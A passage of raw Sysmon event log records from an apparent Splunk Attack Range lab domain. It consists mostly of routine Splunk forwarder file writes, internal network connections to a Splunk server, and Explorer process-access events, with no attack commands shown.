Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FFDDCE3D65AE64549B123062354AC0,SHA256=C5D5C45E6FD6990F048D19C66A4D17A914DF1F00A9C390447689F343DF56596A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:11.458{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CA1C3076DF46A5CCF296A214C9B1E2F,SHA256=0BE7AED0DADD0C9ED2B838A5A547D09FA4DA2AF354C1AD8E943F2EA66F664B49,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:09.342{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57442-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:12.473{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B3ED13AB95D05584D515D9941B0FCBB,SHA256=DC482E497A94781C3282F16ED534BAE26A847BD5F1BA6FA661FC62513A6169E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:12.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8D18A8CA2FBA95413D25B096536F492,SHA256=8881A546560FD456289DDF75BC9ED4007572B977A4D956214D32DFBF478768F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:13.474{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07AA4E3E2F592142F34A967E6596B0CD,SHA256=2BCF1307F130BEAAD5EF1CF99058B552E73A8E445C5E371C87073D1AD3BAE372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:13.536{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DC1244F6B1DAF28B80BEA1DDE04A85D,SHA256=40144663D257BE17D70846A69B43E918363A9A2F1D297DC6F8747C0AE5ED8825,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:14.552{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B55C2C85A59A5D4F97F42F9F3494CB0,SHA256=240C87986B6BEAD5C36AD96DFC4A6296E94C3B890D2358BB69FA851F23EFC197,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:14.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36035A9FF5FF1EBDA68D9B546B16ECC4,SHA256=C0AF71CC8011D1841C7AB8F937537DB2A21467A4F6EB3A034AA349FEE73E2CC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:15.595{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18F605685C3819E4D48B08121C0F7F82,SHA256=C7807A47B01D9AEA87C472AA4B75C428E9B978BD376BA4041D336C222D057656,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.842{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:15.842{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0B3DAC3257B90248045FD918D96214C6,SHA256=8D9EC7B569636414B169A79F0F5731830C08D988B9523BF2B5893C00CE0E1E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AFC2C793C9759B1F89DBD492200FCB3C,SHA256=6179FF170D787FC72901EF94FDFB44FA1AA7E364EA422E929391F7D4FAC750EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.520{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F149DFA1ACB1B547A482889972EB609,SHA256=CD28329D7E3BC4F0160BE2DAC13F4DCAB8536DE8DD7BFD5F7F66E39822875DE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:16.626{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E028D214733F10FAEC9AEF12FD79347,SHA256=AF56FF291A5ECC08C4090F17CD8253348AB3FB22F05303FB221ABFA38D705AE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:08.064{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61945-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001054219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:08.064{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61945-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001054218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:16.538{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71F6326D6881D66B75D8CFEC864688C9,SHA256=0C95B7963E6118780F35920B09B49450A5A7C82F76C7AF52AA99208EC8BB16C6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:17.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70D34F55A64EB79348350AA48704ECF0,SHA256=77B2FA0FF304092BFAB521DE6C177D3446EF42E09A5A9EDC4247858EF899A74D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:15.307{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57443-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:17.626{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DFF3E512E71FC770B50C1A3D83E66B2,SHA256=15F36526C69EE53F128DDDA382D24EC4C8CB78D32791A5BBDAA4A6AD8F727592,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:08.686{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61946-false10.0.1.12-8000- 23542300x80000000000000001054224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:18.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B07BD8F27D9C77FC5533A05A65FD2118,SHA256=61D4AC90791BC9A2989D4FBB00E0F7068B44DA998380036A646345F7347B0A24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:18.641{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FE2111D924B8FC8D244A34596278126,SHA256=C8370F3115F6BCF64A0BEEDACBE209E4B7D21D0980192EC8BCB49556482EFECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:18.519{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:19.641{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A369228133B84058A3EC1B9CF7D9EFE3,SHA256=D7A2B5BFB7CED32D5357FB53ACDEEC6569FE73DAC0396685FDD081029E8564BE,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001054231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.920{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.920{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:19.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:19.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:19.574{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=844175AC0F3B91A51E5A34A0F21C5ED7,SHA256=2F5B934C021872AA85F9F9E75AC98BF4EA97F3B7ED5894ABE22DB0CA558B9147,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:20.829{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:20.673{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7F56529B4F137D27EC2D517BB53F53,SHA256=6F85A6695E6F52B168C655317FEF6B124D6EEB9FCCA54D526F06D267B2A1B80D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:20.588{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A39617AD37C55C363E55F9D9E4EC13F6,SHA256=28F0015ED0B81A77B1D7AA0963510E365A84026BBDBFD4D05EBD492BADFBB575,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:21.921{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:21.921{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:21.589{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0C029906FCB22B6E5203EA11BF56E2C,SHA256=E8A72F80A54B96075362D44288B31924CF761377A5D563CA1026220D214B52F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:21.688{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C82E192EE0C735400ED1094AA46F3586,SHA256=7037E767D7ADD15009F4FEBD3B646202B4858AF81C6CB2A2B90F4CCA8A797AF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:22.920{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001054237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:14.663{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61947-false10.0.1.12-8000- 23542300x80000000000000001054236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:22.605{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=017F01DBBDCCD31ECB7A30CDDCC1B55B,SHA256=78037BD0D7502666095A98E9B202DA3301F77E7F051B8EA432B3346723F0E916,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:22.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=309C5C2FD5BFE0410195B9C949142525,SHA256=1BD5DECA9C7908B47B4D75F0C1EBC655063BE09C276907BD7EEDDBEF8C71BC86,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:20.963{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57444-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000810086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:23.829{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA41CF1827ACC36E939B09E75E17941C,SHA256=F5F404A6181967F2D7A66AD2AC375A398FED9F6E8432ED823385DDA69309E4DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 